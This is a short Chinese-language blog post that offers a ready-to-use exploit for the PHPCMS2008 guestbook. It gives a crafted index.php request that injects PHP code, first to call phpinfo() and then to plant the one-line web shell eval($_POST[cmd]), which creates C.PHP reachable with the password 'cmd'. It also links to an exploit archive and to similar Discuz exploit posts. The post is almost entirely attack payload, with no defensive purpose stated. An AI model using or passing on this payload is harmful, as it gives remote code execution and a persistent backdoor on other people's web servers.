PHPCMS2008利用EXP

发布:admin | 发布时间: 2010年2月15日

guestbook/index.php?keywords=test&&page=3&${${phpinfo()}}

phpinfo替换成<?php eval($_POST[cmd])?>
<?php eval($_POST[cmd])?>
index.php?keywords=test&&page=3&${${<?php eval($_POST[cmd])?>}}
在/guestbook/目录下生成C.PHP用一句话连 ..密码cmd

http://www.dosjj.com//uploadfiles/phpcms_exploit_30717.rar

文章如转载，请注明转载自：http://www.5iadmin.com/post/307.html

标签:

PHPCMS2008 exp phpinfo

相关文章:
discuz!7.1、7.2远程代码执行漏洞exp  (2010-2-5 14:27:2)
Discuz! version 5.0.0 suffers from a cross site scripting vulnerability EXP  (2010-2-1 14:51:45)
Discuz! 7.1 & 7.2 远程代码执行漏洞  (2010-1-26 14:42:57)

后一篇：« windows2003关机时如何关闭询问关机理由

前一篇：oracle9i与SQL的链接 »

发布:admin | 分类:最新漏洞 | 评论:0 | 引用:0 | 浏览: | TrackBack引用地址

发表评论

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。